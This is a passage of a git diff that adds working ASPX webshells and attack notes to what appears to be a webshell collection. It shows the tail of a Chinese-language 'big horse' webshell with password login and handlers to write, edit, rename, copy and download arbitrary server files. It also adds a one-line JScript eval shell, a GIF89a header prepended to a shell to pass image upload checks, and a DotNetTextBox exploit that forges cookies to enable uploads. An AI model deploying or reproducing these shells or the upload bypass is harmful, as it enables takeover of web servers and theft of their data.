}
|
||||
Response.Write("删除成功,请刷新之!如果不成功,请多刷新几次再试!");
|
||||
}
|
||||
catch (Exception wrong)
|
||||
{
|
||||
Response.Write("系统错误:" + wrong+"<br>");
|
||||
Response.Write("<font color ='red'>如果有系统错误提示,建议刷新一次再尝试删除!!!</font>");
|
||||
}
|
||||
|
||||
}
|
||||
protected void ButtonProClear_Click(object sender, EventArgs e)
|
||||
{
|
||||
ListBoxPro.Items.Clear();
|
||||
listprocess();
|
||||
}
|
||||
</script>
|
||||
|
||||
<%
|
||||
}
|
||||
else if ((page == "newfile") && (Session["root"] != null))
|
||||
{
|
||||
%>
|
||||
<table align ="center">
|
||||
<form runat="server">
|
||||
<asp:TextBox ID="TextBoxNewfile" runat="server" Width="477px" ForeColor="#009900" >c:\char.txt</asp:TextBox>
|
||||
<asp:Button ID="ButtonNewfile" runat="server" OnClick="ButtonNewfile_Click" Text="保存" Width="57px" /><br />
|
||||
<br />
|
||||
<asp:TextBox ID="TextBoxNewfiles" runat="server" Height="324px" ForeColor="#009900" TextMode="MultiLine" Width="537px" ></asp:TextBox><br />
|
||||
</form>
|
||||
</table>
|
||||
|
||||
<script runat="server">
|
||||
protected void ButtonNewfile_Click(object sender, EventArgs e)
|
||||
{
|
||||
StreamWriter sw = new StreamWriter(TextBoxNewfile.Text.ToString(),false,Encoding.Default);
|
||||
sw.Write(TextBoxNewfiles.Text.ToString());
|
||||
sw.Close();
|
||||
}
|
||||
</script>
|
||||
<%
|
||||
}
|
||||
else if ((action == "edit") && (Session["root"] != null))
|
||||
{
|
||||
%>
|
||||
<%
|
||||
TextBoxReadDir.Text = src;
|
||||
|
||||
StreamReader sr = new StreamReader(TextBoxReadDir.Text.ToString(), Encoding.Default);
|
||||
TextBoxFileContent.Text = sr.ReadToEnd();
|
||||
sr.Close();
|
||||
%>
|
||||
<table align='center'>
|
||||
<form runat="server">
|
||||
<asp:TextBox ID="TextBoxReadDir" runat="server" Width="477px" ForeColor="#009900" ></asp:TextBox>
|
||||
<asp:Button ID="ButtonSave" runat="server" OnClick="ButtonSave_Click" Text="保存" Width="57px" /><br />
|
||||
<br />
|
||||
<asp:TextBox ID="TextBoxFileContent" runat="server" Height="324px" TextMode="MultiLine" Width="537px" ></asp:TextBox><br />
|
||||
<br />
|
||||
</form>
|
||||
<table>
|
||||
|
||||
<script runat="server">
|
||||
protected void ButtonSave_Click(object sender, EventArgs e)
|
||||
{
|
||||
StreamWriter sw = new StreamWriter(TextBoxReadDir.Text.ToString(),false,Encoding.Default);
|
||||
sw.Write(TextBoxFileContent.Text.ToString());
|
||||
sw.Close();
|
||||
}
|
||||
</script>
|
||||
|
||||
<%
|
||||
}
|
||||
else if (action == "rename" && Session["root"] != null)
|
||||
{
|
||||
TextBoxRename.Text = src;
|
||||
TextBoxRenameTo.Text = src;
|
||||
%>
|
||||
<table align ="center">
|
||||
<form runat="server">
|
||||
重命名:<asp:TextBox ID="TextBoxRename" runat="server" Width="495px"></asp:TextBox><br />
|
||||
为:
|
||||
<asp:TextBox ID="TextBoxRenameTo" runat="server" Width="495px"></asp:TextBox>
|
||||
<asp:Button ID="ButtonRename" runat="server" OnClick="ButtonRename_Click" Text="重命名" /><br />
|
||||
</form>
|
||||
<table>
|
||||
<script runat="server">
|
||||
protected void ButtonRename_Click(object sender, EventArgs e)
|
||||
{
|
||||
File.Move(TextBoxRename.Text.ToString(),TextBoxRenameTo.Text.ToString());
|
||||
TextBoxRenameTo.Text = "";
|
||||
}
|
||||
</script>
|
||||
<%
|
||||
}
|
||||
|
||||
if (action == "copy" && (Session["root"] != null))
|
||||
{
|
||||
TextBoxCopy.Text = src;
|
||||
%>
|
||||
<form id="Form9" runat="server">
|
||||
<table align="center">
|
||||
从:<asp:TextBox ID="TextBoxCopy" runat="server" Width="469px"></asp:TextBox><br />
|
||||
到:<asp:TextBox ID="TextBoxCopyTo" runat="server" Width="468px"></asp:TextBox>
|
||||
<asp:Button ID="ButtonCopy" runat="server" OnClick="ButtonCopy_Click" Text=" 拷贝" />
|
||||
</table>
|
||||
</form>
|
||||
<script runat="server">
|
||||
protected void ButtonCopy_Click(object sender, EventArgs e)
|
||||
{
|
||||
string old = TextBoxCopy.Text;
|
||||
string news = TextBoxCopyTo.Text;
|
||||
File.Copy(old, news, true);
|
||||
|
||||
}
|
||||
</script>
|
||||
<%
|
||||
}
|
||||
|
||||
else if (action == "down" && (Session["root"] != null))
|
||||
{
|
||||
DownFile(src);
|
||||
|
||||
%>
|
||||
|
||||
|
||||
<html>
|
||||
<head id="Head1" runat="server">
|
||||
<title></title>
|
||||
<script runat="server">
|
||||
public ArrayList al = new ArrayList();
|
||||
|
||||
protected void Page_Load(object sender, EventArgs e)
|
||||
{
|
||||
Response.Write("<title>凝聚科技专用AspX大马 By:sunue</title>");
|
||||
|
||||
}
|
||||
</script>
|
||||
|
||||
</head>
|
||||
<body>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
<% }
|
||||
}
|
||||
else
|
||||
{
|
||||
%>
|
||||
<form id="Form10" runat="server">
|
||||
<font color = "00c000">/*只支持鼠标登录,不可用回车*/</font></p>
|
||||
<font color = "00c000">/*警告:此网页木马采用Visual C# 2005 编写,仅供学习研究之用,不得用于非法*/</font></p>
|
||||
<table>
|
||||
<tr>
|
||||
<td><asp:TextBox ID="pass" runat="server" TextMode="Password" ForeColor = "#009900"></asp:TextBox></td>
|
||||
<td><asp:Button ID="Login" runat="server" OnClick="Login_Click" Text="登录" Width="56px" Height="26px"/></td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<script runat="server">
|
||||
void Login_Click(object sender, EventArgs e)
|
||||
{
|
||||
if (pass.Text == PWD)
|
||||
{
|
||||
Session["root"] = 1;
|
||||
Session.Timeout = 90;
|
||||
Response.Redirect(Request.Url+"?page=index&src="+ Server.MapPath(".")+"\\");
|
||||
}
|
||||
else
|
||||
Response.Write("密码错误");
|
||||
}
|
||||
</script>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
<hr>
|
||||
<table align="center"><font color="#009900">凝聚科技专用AspX大马 By:凝聚科技</font></table>
|
||||
</table>
|
||||
|
1266
aspx/con2.asp
Normal file
1266
aspx/con2.asp
Normal file
File diff suppressed because one or more lines are too long
1012
aspx/con2.aspx
Normal file
1012
aspx/con2.aspx
Normal file
File diff suppressed because it is too large
Load diff
1
aspx/editor.aspx
Normal file
1
aspx/editor.aspx
Normal file
|
@ -0,0 +1 @@
|
|||
<%@Page Language="Jscript"%><%eval(Request.Item["iceking"],"unsafe");%>
|
|
@ -1,4 +1,5 @@
|
|||
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
|
||||
gif89a
|
||||
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
|
||||
<%@ import Namespace="System.IO"%>
|
||||
<%@ import Namespace="System.Diagnostics"%>
|
||||
<%@ import Namespace="System.Data"%>
|
||||
|
|
64
other/DotNetTextBox-bug
Normal file
64
other/DotNetTextBox-bug
Normal file
|
@ -0,0 +1,64 @@
|
|||
|
||||
|
||||
DotNetTextBox编辑器漏洞
|
||||
|
||||
修改cookie为:
|
||||
|
||||
cookie:UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/;
|
||||
|
||||
之后浏览 xxx.com/system_dntb/uploadFile.aspx/uploadFile.aspx
|
||||
|
||||
即可上传
|
||||
|
||||
如不行 则在system_dntb/Advanced.aspx添加 aspx or别的类型
|
||||
|
||||
|
||||
|
||||
[{
|
||||
"domain": ".xxx.org",
|
||||
"expirationDate": 1401960780,
|
||||
"hostOnly": false,
|
||||
"httpOnly": false,
|
||||
"name": "UserType",
|
||||
"path": "/",
|
||||
"secure": false,
|
||||
"session": false,
|
||||
"storeId": "1",
|
||||
"value": "0"
|
||||
},
|
||||
{
|
||||
"domain": ".xxx.org",
|
||||
"expirationDate": 1401960780,
|
||||
"hostOnly": false,
|
||||
"httpOnly": false,
|
||||
"name": "IsEdition",
|
||||
"path": "/",
|
||||
"secure": false,
|
||||
"session": false,
|
||||
"storeId": "1",
|
||||
"value": "0"
|
||||
},
|
||||
{
|
||||
"domain": ".xxx.org",
|
||||
"expirationDate": 1401960780,
|
||||
"hostOnly": false,
|
||||
"httpOnly": false,
|
||||
"name": "Info",
|
||||
"path": "/",
|
||||
"secure": false,
|
||||
"session": false,
|
||||
"storeId": "1",
|
||||
"value": "1"
|
||||
},
|
||||
{
|
||||
"domain": ".xxx.org",
|
||||
"expirationDate": 1401960780,
|
||||
"hostOnly": false,
|
||||
"httpOnly": false,
|
||||
"name": "uploadFolder",
|
||||
"path": "/",
|
||||
"secure": false,
|
||||
"session": false,
|
||||
"storeId": "1",
|
||||
"value": "../system_dntb/"
|
||||
}]
|
Loading…
Add table
Reference in a new issue